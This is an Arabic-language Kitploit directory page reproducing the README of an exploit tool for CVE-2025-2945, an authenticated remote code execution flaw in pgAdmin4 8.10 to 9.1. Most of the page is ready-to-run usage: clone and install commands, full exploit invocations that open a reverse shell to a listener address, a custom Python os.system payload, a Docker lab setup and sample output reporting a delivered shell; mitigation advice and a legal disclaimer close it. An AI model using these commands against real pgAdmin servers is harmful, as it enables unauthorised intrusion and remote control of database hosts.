Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-2945 — استغلال لثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) في pgAdmin4 التي تؤثر على الإصدارات من 8.10 إلى 9.1. | Kitploit
أدوات/GitHubGitHub/g0d150ne/cve-2025-2945
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubg0d150ne/cve-2025-2945

CVE-2025-2945

استغلال لثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) في pgAdmin4 التي تؤثر على الإصدارات من 8.10 إلى 9.1.

عرض المستودع
4منذ 29 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-2945 - استغلال تنفيذ الأوامر عن بُعد المُوثَّق في pgAdmin4

المؤلف: G0D150NE الإصدار: 2.0.0
CVE: CVE-2025-2945
الخطورة: حرجة (CVSS 9.9)

📌 الوصف

استغلال لثغرة تنفيذ الأوامر عن بُعد (RCE) في pgAdmin4 التي تؤثر على الإصدارات 8.10 إلى 9.1.

توجد الثغرة في نقطة النهاية /sqleditor/query_tool/download حيث يتم تمرير المعامل query_commited بدون تعقيم إلى دالة eval() في Python، مما يسمح بتنفيذ أكواد عشوائية.

⚡ الميزات

  • ✅ اكتشاف تلقائي للإصدار
  • ✅ جمع رمز CSRF من مصادر متعددة
  • ✅ تعداد معرّفات الخادم/المجموعة
  • ✅ حمولة قشرة عكسية (مشفرة base64)
  • ✅ دعم حمولة مخصصة
  • ✅ وضع تصحيح مفصّل (Verbose)
  • ✅ مخرجات وحدة تحكم ملونة
  • ✅ تجاوز التحقق من SSL

🚀 التثبيت

root@kitploit:~
# Clone or download the script git clone https://github.com/g0d150ne/CVE-2025-2945 cd CVE-2025-2945 # Install dependencies pip install requests

🎯 الاستخدام

الاستخدام الأساسي

root@kitploit:~
python3 poc.py \
  --target-url http://target:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444

مع الإخراج المفصّل

root@kitploit:~
python3 poc.py \
  --target-url http://target:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444 \
  -v

حمولة مخصصة

root@kitploit:~
python3 poc.py \
  --target-url http://target:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444 \
  --custom-payload "__import__('os').system('whoami > /tmp/test.txt')"

تخطّي فحص الإصدار

root@kitploit:~
python3 poc.py \
  --target-url http://target:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444 \
  --skip-version-check

📊 الوسائط

الوسيط مطلوب الوصف --target-url مطلوب عنوان URL الأساسي لـ pgAdmin4 (http://RHOST:PORT/) --username مطلوب البريد الإلكتروني لتسجيل الدخول إلى pgAdmin4 --password مطلوب كلمة مرور تسجيل الدخول إلى pgAdmin4 --db-user مطلوب اسم مستخدم قاعدة البيانات --db-pass مطلوب كلمة مرور قاعدة البيانات --db-name مطلوب اسم قاعدة البيانات --Rhost مطلوب عنوان IP للمستمع الخاص بالقشرة العكسية --Rport مطلوب منفذ المستمع الخاص بالقشرة العكسية --max-server-id غير مطلوب أقصى معرّف خادم لفحصه (الافتراضي: 10) --skip-version-check غير مطلوب تخطّي التحقق من الإصدار --custom-payload غير مطلوب حمولة Python مخصصة --verbose, -v غير مطلوب تفعيل مخرجات التصحيح --no-banner غير مطلوب إخفاء الشعار

📋 المتطلبات

· Python 3.6+ · مكتبة requests

root@kitploit:~
pip install requests

🧪 بيئة الاختبار

root@kitploit:~
# Docker pgAdmin vulnerable version
docker run -d -p 5050:5050 \
  -e [email protected] \
  -e PGADMIN_DEFAULT_PASSWORD=admin123 \
  dpage/pgadmin4:8.10

# Then run the exploit
python3 poc.py \
  --target-url http://localhost:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444

🖥️ مثال على الإخراج

root@kitploit:~
   ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄ 
  ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌
  ▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ 
  ▐░▌          ▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌          
  ▐░█▄▄▄▄▄▄▄▄▄ ▐░█▄▄▄▄▄▄▄█░▌▐░▌       ▐░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌          
  ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌       ▐░▌▐░░░░░░░░░░░▌▐░▌          
   ▀▀▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌       ▐░▌ ▀▀▀▀▀▀▀▀▀█░▌▐░▌          
            ▐░▌▐░▌       ▐░▌▐░▌       ▐░▌          ▐░▌▐░▌          
   ▄▄▄▄▄▄▄▄▄█░▌▐░▌       ▐░▌▐░█▄▄▄▄▄▄▄█░▌ ▄▄▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ 
  ▐░░░░░░░░░░░▌▐░▌       ▐░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌
   ▀▀▀▀▀▀▀▀▀▀▀  ▀         ▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀ 
   
   CVE-2025-2945 - pgAdmin4 Authenticated RCE
   Author: G0D150NE
   Version: 2.0.0

[*] Target running vulnerable version 8.10
[*] Authenticating as [email protected]...
[+] Authentication successful
[*] Scanning for valid server (SGID: 7, max: 10)...
[+] Found valid server (SGID: 7, SID: 1)
[*] Initializing SQL editor (trans_id: 4827193)...
[+] SQL editor initialized
[*] Reverse shell payload to 10.10.14.7:4444
[*] Sending payload...
[+] Payload delivered (HTTP 500)
[*] Check listener at your endpoint
[+] Exploit successful!
[*] Check reverse shell on 10.10.14.7:4444

🛡️ التخفيف

· قم بترقية pgAdmin4 إلى الإصدار 9.2 أو أحدث · قيّد الوصول إلى واجهة pgAdmin · استخدم بيانات اعتماد قوية · فعّل المصادقة متعددة العوامل (MFA) إذا كانت متاحة

⚠️ إخلاء المسؤولية

هذه الأداة مخصّصة لاختبارات الاختراق المصرّح بها والأغراض التعليمية فقط. استخدامها ضد أنظمة بدون إذن صريح غير قانوني. لا يتحمّل المؤلف أي مسؤولية عن أي إساءة استخدام.

🔗 المراجع

· CVE-2025-2945 · النشرة الأمنية لـ pgAdmin

📄 الترخيص

رخصة MIT

تنزيل الأداة